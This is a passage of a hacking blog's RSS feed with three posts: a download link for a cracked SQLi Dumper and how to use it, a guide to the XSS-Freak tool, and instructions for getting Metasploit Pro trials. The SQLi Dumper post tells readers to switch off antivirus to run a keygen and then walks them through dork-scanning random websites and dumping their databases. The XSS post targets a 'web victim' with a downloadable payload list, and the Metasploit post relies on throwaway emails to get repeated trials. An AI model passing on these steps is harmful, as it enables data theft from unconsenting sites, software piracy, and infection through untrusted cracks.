		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[tool]]></category>
		<category><![CDATA[v10.1]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5400</guid>

					<description><![CDATA[SQLi Dumper is a specialized software to exploit SQL errors. You can use it to exploit a variety of different websites Join the channel Telegram of the AnonyViet 👉 Link 👈 Main function: Multi-threading support. Online search engine (to find features); Automatic extraction and analysis from URL lists; Automatically search data in bulk URL lists; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>SQLi Dumper</strong> is a specialized software to exploit SQL errors.  You can use it to exploit a variety of different websites</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><strong>Main function:</strong></p>
<ul>
<li>Multi-threading support.  Online search engine (to find features);</li>
<li>Automatic extraction and analysis from URL lists;</li>
<li>Automatically search data in bulk URL lists;</li>
<li>Automated parser for injection points by URL, POST, Cookies, UserLogin or UserPassword;</li>
<li>Dumper supports data dump with multithreading (database/table/column/fetch);</li>
<li>Mining supports up to 100 threads;</li>
<li>Analyzer and Dumper support streams up to 50;</li>
<li>Advanced WAF bypass method;</li>
<li>Advanced custom query box;</li>
<li>Dumper can dump large amounts of data, with the ability to control the latency of each request (multithreading);</li>
<li>Vulnerability to vulnerability is easy;</li>
<li>Support proxy list;</li>
<li>GeoIP database;</li>
<li>Internal database;</li>
<li>Trash bin system;</li>
<li>Administrator login finder;</li>
<li>Hasher cracker online;</li>
<li>Reverse IP;</li>
<li>.Exe standalone (no installation).</li>
</ul>
<h2 id="ftoc-tai-phan-mem" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 14pt;">Download software</span></span></strong></h2>
<p style="text-align: center;"><span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.fshare.vn%2Ffile%2FDXAESJ19VF9N" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"><strong><span style="font-size: 12pt;">Download SQLi Dumper v10.1 Cracked</span></strong></a></span></p>
<h2 id="ftoc-cach-crack" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 14pt;">How to crack</span></span></strong></h2>
<p><span style="color: #000000;"><strong><span style="font-size: 12pt;">Step 1: </span></strong><span style="font-size: 12pt;">Turn on the keygen file to get the key</span></span></p>
<p style="text-align: center;"><img decoding="async" class="alignnone size-medium wp-image-6661" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2-300x72.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 11" width="300" height="72" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2-300x72.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-2.png 385w" sizes="(max-width: 300px) 100vw, 300px" title="Download SQLi Dumper v10.1 Full - SQL Injection 12 Exploit Tool"/></p>
<p><span style="font-size: 12pt;"><strong><span style="color: #000000;">Step 2:</span></strong><span style="color: #000000;">  Run the program and paste the key in</span></span></p>
<p><strong><span style="color: #000000;"><span style="font-size: 12pt;">Note: when turning on the keygen file, please turn off the computer protection software because these software mistakenly identify as containing viruses.</span></span></strong></p>
<h2 id="ftoc-cach-su-dung-sqli-dumper-v10-1" class="ftwp-heading"><strong><span style="color: #800080;"><span style="font-size: 18pt;">How to use SQLi Dumper v10.1</span></span></strong></h2>
<p><strong><span style="color: #000000;"><span style="font-size: 12pt;">Step 1: </span></span></strong><span style="color: #000000;"><span style="font-size: 12pt;">open the software</span></span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6663" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-300x169.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 12 Exploit Tool" width="557" height="314" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-300x169.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1024x576.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-768x432.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1536x864.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-750x422.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3-1140x641.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-3.png 1600w" sizes="auto, (max-width: 557px) 100vw, 557px" title="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection errors 13"/></p>
<p><strong>Step 2:</strong> This is the main interface of the software</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6665" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-300x162.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection errors 13" width="555" height="300" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-768x415.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-1024x553.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-696x376.png 696w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-1068x577.png 1068w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1-778x420.png 778w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-1.png 1594w" sizes="auto, (max-width: 555px) 100vw, 555px" title="Download SQLi Dumper v10.1 Full - SQL Injection 14 . Exploit Tool"/></p>
<p>Below is a list of dorks used to scan:</p>
<p style="text-align: center;"><span style="font-size: 12pt;"><strong>Dork scans the site</strong></span></p>
<p><span style="font-size: 12pt;"><span style="color: #000000;"><strong>Step 3: </strong>Once you have the dork, you paste it in, select start scanner and start scanning</span></span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6666" src="https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 14 . Exploit Tool" width="548" height="296" srcset="https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1024x552.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1536x828.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-750x404.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/sqli-1-1.png 1595w" sizes="auto, (max-width: 548px) 100vw, 548px" title="Download SQLi Dumper v10.1 Full - SQL Injection 15 . Exploit Tool"/></p>
<p><strong>Step 4:</strong> After you have scanned enough, you switch to the Exploitables page and select start Exploitables to continue scanning</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6667" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 15 . Exploit Tool" width="545" height="294" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1024x552.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1536x829.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-750x405.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-4.png 1594w" sizes="auto, (max-width: 545px) 100vw, 545px" title="Download SQLi Dumper v10.1 Full - SQL Injection 16 . Exploit Tool"/></p>
<p style="text-align: left;"><strong>Step 5:</strong> After scanning is complete, switch to Injectables and select start Analyzer to check the site for errors</p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6668" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-300x162.png" alt="Download SQLi Dumper v10.1 Full - SQL Injection 16 . Exploit Tool" width="561" height="303" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1024x553.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-768x415.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1536x829.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-750x405.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5-1140x615.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5.png 1595w" sizes="auto, (max-width: 561px) 100vw, 561px" title="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 17"/></p>
<p style="text-align: left;"><strong><span style="font-size: 12pt;">Step 6: </span></strong><span style="font-size: 12pt;">Once there is an error site, right click and select go to dumper </span></p>
<p style="text-align: center;"><img decoding="async" loading="lazy" class="alignnone wp-image-6669" src="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-300x162.png" alt="Download SQLi Dumper v10.1 Full - Tool to exploit SQL Injection 17" width="559" height="302" srcset="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-300x162.png 300w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1024x551.png 1024w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-768x414.png 768w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1536x827.png 1536w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-750x404.png 750w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6-1140x614.png 1140w, https://anonyviet.com/wp-content/uploads/2017/10/SQLi-6.png 1595w" sizes="auto, (max-width: 559px) 100vw, 559px" title="Download SQLi Dumper v10.1 Full - SQL Injection 18 . Exploit Tool"/></p>
<p><strong>Here:</strong></p>
<ul>
<li>First choose databases to get data</li>
<li>next, select get columns to get column</li>
<li>Finally, check the lines and select dump data to get information</li>
</ul>
<p style="text-align: right;"><strong>MK-39</strong></p>
<p style="text-align: right;"><span style="font-size: 12pt;"><strong>Good luck</strong></span></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;6659&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/download-sqli-dumper-v10-1-full-sql-injection-error-exploit-tool/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2017/10/SQLi-5.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to use XSS-Freak to exploit XSS vulnerabilities automatically</title>
		<link>https://en.anonyviet.com/how-to-use-xss-freak-to-exploit-xss-vulnerabilities-automatically/</link>
					<comments>https://en.anonyviet.com/how-to-use-xss-freak-to-exploit-xss-vulnerabilities-automatically/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 28 Jan 2023 00:36:11 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Automatically]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[XSS]]></category>
		<category><![CDATA[XSSFreak]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=5268</guid>

					<description><![CDATA[XSS-Freak is a tool written entirely in Python3 to perform XSS vulnerability scanning on the network. This tool scans XSS to crawl the entire website and scans all possible directories and links to expand its attack range. It then activates the search to get information about the input tags. Next, it will start sending requests [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>XSS-Freak is a tool written entirely in Python3 to perform XSS vulnerability scanning on the network.  This tool scans XSS to crawl the entire website and scans all possible directories and links to expand its attack range.  It then activates the search to get information about the input tags.  Next, it will start sending requests with XSS included.  If the site has an input that is vulnerable to exploitation and is not secure from XSS attacks, XSS-Freak will detect it within seconds.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2020%2F04%2Fxss-freak.jpg" rel="noopener" class="local-link"><img post-id="5268" fifu-featured="1" decoding="async" width="532" height="327" class="aligncenter size-full wp-image-18895" src="https://anonyviet.com/wp-content/uploads/2020/04/xss-freak.jpg" alt="How to use XSS-Freak to exploit XSS vulnerabilities automatically" title="How to use XSS-Freak to exploit XSS vulnerabilities automatically" srcset="https://anonyviet.com/wp-content/uploads/2020/04/xss-freak.jpg 532w, https://anonyviet.com/wp-content/uploads/2020/04/xss-freak-300x184.jpg 300w" sizes="(max-width: 532px) 100vw, 532px" title="How to use XSS-Freak to exploit automatic XSS vulnerability 7"/></a></p>
<h2 id="ftoc-vay-xss-la-gi" class="ftwp-heading">So what is XSS?</h2>
<p>XSS, also known as cross-site scripting, is known as a type of vulnerability found in web applications.  With the help of XSS, attackers can inject malicious scripts into (seemingly) trusted websites.</p>
<p>Cross-site Scripting (XSS) is one of the most popular hacking techniques when it comes to vulnerabilities on the web.  This error occurs when a website generates output based on user input.  If the website takes data from the input without proper validation and encryption, it will surely be exploited by hackers.</p>
<p>XSS allows hackers to run malicious JavaScript commands in the victim&#8217;s browser, which can take over <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Foptshare.com%2Fblog%2Fgiai-thich-mot-thuat-ngu-co-ban-trong-google-analytics%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">user session</a>. , nude photos, &#8230;.</p>
<p>Security flaws in web applications allow these attacks to happen very often.  These errors are quite common and occur in web applications that require user input.</p>
<p>To learn more about Cross-site Scripting (XSS) and its other types, see <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.cyberpunk.rs%2Fcross-site-scripting-xss-explanation-details" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Cross-site Scripting (XSS) detailed explanation</a>.</p>
<h2 id="ftoc-tinh-nang" class="ftwp-heading">Feature:</h2>
<p>– Send Payloads XSS</p>
<p>– Written entirely in python3</p>
<h2 id="ftoc-he-dieu-hanh-ho-tro" class="ftwp-heading">Supported operating systems:</h2>
<h2 id="ftoc-yeu-cau" class="ftwp-heading">Request:</h2>
<p>– High speed internet connection</p>
<p>– The PC is capable of processing a large number of data streams simultaneously</p>
<h2 id="ftoc-xss-freak-hoat-dong-nhu-the-nao" class="ftwp-heading">How does XSS-Freak work</h2>
<p>To perform an attack, a target (web victim) and a list of different XSS payloads are required.  The tool will now start scanning the main web pages including indexed pages for possible directories and links in the site.  It then scans all the folders found in the initial scan and puts them in attack range.  Furthermore, it will scan all the links found in both scans.</p>
<p>Then XSS-Freak will add all HTML input tags to the attack range.  It will start the attack on both HTML input tags using Payloads XSS.  If web input tags are not handled properly, the tool will detect those vulnerabilities right away.</p>
<h2 id="ftoc-uu-diem" class="ftwp-heading">Advantage:</h2>
<p>– Due to the use of multi-threading, processing is fast and efficient</p>
<p>– Capable of crawling complete webs</p>
<h2 id="ftoc-nhuoc-diem" class="ftwp-heading">Defect:</h2>
<p>– Not supported on phones</p>
<p>&#8211; Must have high speed Internet connection</p>
<p>– Requires good hardware</p>
<h2 id="ftoc-cai-dat-xss-freak" class="ftwp-heading">Install XSS-Freak</h2>
<p>You run the following commands:</p>
<p><code><span style="font-size: 12pt;">git clone https://github.com/sepulvedazallalinux/XSS-Freak.git </span></code></p>
<p><code><span style="font-size: 12pt;">cd XSS-Freak/</span></code></p>
<p><code/><code/><code/><code><span style="font-size: 12pt;">pip3 install -r requirements.txt</span></code></p>
<p><span style="font-size: 12pt;"><code>python3 XSS-Freak.py</code></span></p>
<h2 id="ftoc-cach-su-dung" class="ftwp-heading">Using</h2>
<p><img decoding="async" loading="lazy" width="651" height="437" class="size-full wp-image-18901 aligncenter" src="https://anonyviet.com/wp-content/uploads/2020/04/a.png" alt="How to use XSS-Freak to exploit automatic XSS vulnerability 3" srcset="https://anonyviet.com/wp-content/uploads/2020/04/a.png 651w, https://anonyviet.com/wp-content/uploads/2020/04/a-300x201.png 300w" sizes="auto, (max-width: 651px) 100vw, 651px" title="How to use XSS-Freak to exploit automatic XSS vulnerability 8"/></p>
<p>The first arrow is where you enter<a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fwww.insecurelabs.org%2Ftask%2FRule1" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> web link</a> want to attack xss in.</p>
<p>The second arrow, you enter the file name containing <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.fshare.vn%2Ffile%2FHPTOPAWIL5MG" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">payloads xss</a>.</strong> Note, this file must be in the same directory as the tool.</p>
<p>The processing depends on your CPU and network connection.</p>
<p>Good luck!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;18882&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-use-xss-freak-to-exploit-xss-vulnerabilities-automatically/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2020/04/xss-freak.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to Active Metasploit Pro to Exploit Vulnerabilities</title>
		<link>https://en.anonyviet.com/how-to-active-metasploit-pro-to-exploit-vulnerabilities/</link>
					<comments>https://en.anonyviet.com/how-to-active-metasploit-pro-to-exploit-vulnerabilities/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 06:18:05 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Active]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Pro]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3759</guid>

					<description><![CDATA[Metasploit is an automated vulnerability exploit software built into Kali Linux. However, you may not have heard of the Metasploit Pro version. This is an enhanced version with an interface and is a product of the famous security firm Rapid 7. Join the channel Telegram of the AnonyViet 👉 Link 👈 Metasploit Pro Is one [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Metasploit is an automated vulnerability exploit software built into Kali Linux.  However, you may not have heard of the Metasploit Pro version.  This is an enhanced version with an interface and is a product of the famous security firm Rapid 7.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><strong>Metasploit Pro</strong> Is one <strong>mining tool</strong> and <strong>vulnerability authentication</strong> <strong>security</strong> yes <strong>user interface</strong> helps you break down your Pentest (penetration testing) process into smaller and more manageable tasks.  With Metasploit Pro, you can leverage the power of Metasploit Framework (built into Kali Linux, Parrot OS) and mining database available via web interface to perform security assessment and authentication gap.</p>
<p>Metasploit Pro allows you to automate the process of finding and exploiting vulnerabilities, and gives you the tools to experiment with attacks on vulnerable targets.  You can use Metasploit Pro to scan open ports and services, exploit vulnerabilities, collect errors and generate test reports.</p>
<p>Metasploit Pro is also a tool for a team to work together, allowing you to share tasks and information with members of the penetration testing team.  With team collaboration, you can assign each member to perform different tasks on how to exploit the target system.  Team members can share goal data, view collected evidence, and create notes to share knowledge about a specific goal.</p>
<p>Finally, Metasploit Pro is a tool with a Web interface for you to identify a system&#8217;s vulnerability and take action based on it.</p>
<h3 id="ftoc-cac-trinh-duyet-duoc-ho-tro" class="ftwp-heading">Supported Browsers</h3>
<p>Since Metasploit Pro works on a Web interface, you need to install 1 of the browsers below</p>
<ul>
<li>Google Chrome 10+</li>
<li>Mozilla Firefox 18+</li>
<li>Internet Explorer 10+</li>
<li>Iceweasel 18+</li>
</ul>
<p>Metasploit Pro is quite expensive, but the company allows users to register for free 14 days using Business Email.  After 14 days you can still use another email to continue to register for a 14-day trial.  Proceed as follows:</p>
<p>First you visit the page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload%2Fpro%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Sign up for a trial</a>.  Use <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwebsite-tao-mail-ao-tam-thoi%2F" rel="noopener" class="local-link">temporary virtual mail</a> to get Business Mail to register for an account.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fdang-ky-nhan-key-metaspoit-pro.jpg" rel="noopener" class="local-link"><img decoding="async" class="aligncenter size-full wp-image-28468" src="https://anonyviet.com/wp-content/uploads/2021/07/dang-ky-nhan-key-metaspoit-pro.jpg" alt="register key metaspot pro" width="866" height="444" srcset="https://anonyviet.com/wp-content/uploads/2021/07/dang-ky-nhan-key-metaspoit-pro.jpg 866w, https://anonyviet.com/wp-content/uploads/2021/07/dang-ky-nhan-key-metaspoit-pro-300x154.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/dang-ky-nhan-key-metaspoit-pro-768x394.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/dang-ky-nhan-key-metaspoit-pro-750x385.jpg 750w" sizes="(max-width: 866px) 100vw, 866px" title="How to Active Metasploit Pro to exploit security hole 18"/></a></p>
<p>Wait for about 3-5 minutes, you will receive the Key in Email</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Factive-key-metaspolit-pro.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28469" src="https://anonyviet.com/wp-content/uploads/2021/07/active-key-metaspolit-pro.jpg" alt="How to Active Metasploit Pro to Exploit Vulnerability 4" width="503" height="322" srcset="https://anonyviet.com/wp-content/uploads/2021/07/active-key-metaspolit-pro.jpg 503w, https://anonyviet.com/wp-content/uploads/2021/07/active-key-metaspolit-pro-300x192.jpg 300w" sizes="auto, (max-width: 503px) 100vw, 503px" title="How to Active Metasploit Pro to Exploit Vulnerability 19"/></a></p>
<p>Next, you access <strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Fmetasploit%2Fdownload%2Fpro%2Fthank-you%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Download Metasploit Pro</a></strong>  about and install.  During the installation process, you need to note a few steps:</p>
<p>Select Metasploit Pro installation directory</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F1-chon-thu-muc-cai-dat.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-28470 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/1-chon-thu-muc-cai-dat.jpg" alt="Select Metasploit . installation directory" width="469" height="351" srcset="https://anonyviet.com/wp-content/uploads/2021/07/1-chon-thu-muc-cai-dat.jpg 469w, https://anonyviet.com/wp-content/uploads/2021/07/1-chon-thu-muc-cai-dat-300x225.jpg 300w" sizes="auto, (max-width: 469px) 100vw, 469px" title="How to Active Metasploit Pro to Exploit Vulnerability 20"/></a></p>
<p>Disable Anti-Virus and Firewall on Windows.  If you use Windows Defender, turn off Realtime-Protection scanning.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F2-disable-antivirus.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28471" src="https://anonyviet.com/wp-content/uploads/2021/07/2-disable-antivirus.jpg" alt="disable antivirus" width="469" height="352" srcset="https://anonyviet.com/wp-content/uploads/2021/07/2-disable-antivirus.jpg 469w, https://anonyviet.com/wp-content/uploads/2021/07/2-disable-antivirus-300x225.jpg 300w" sizes="auto, (max-width: 469px) 100vw, 469px" title="How to Active Metasploit Pro to Exploit Vulnerability 21"/></a></p>
<p>This is the step to set up the Port to start Metasploit Pro in the browser.  It is best to leave the default as <strong>3790</strong>and remember this Port to open the program half way.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2F3-ssl-port.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-28472 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/3-ssl-port.jpg" alt="Metasploit boot port" width="467" height="348" srcset="https://anonyviet.com/wp-content/uploads/2021/07/3-ssl-port.jpg 467w, https://anonyviet.com/wp-content/uploads/2021/07/3-ssl-port-300x224.jpg 300w" sizes="auto, (max-width: 467px) 100vw, 467px" title="How to Active Metasploit Pro to exploit security hole 22"/></a></p>
<p>This is the step to create an SSL certificate for Metasploit Pro, you should also leave the default.</p>
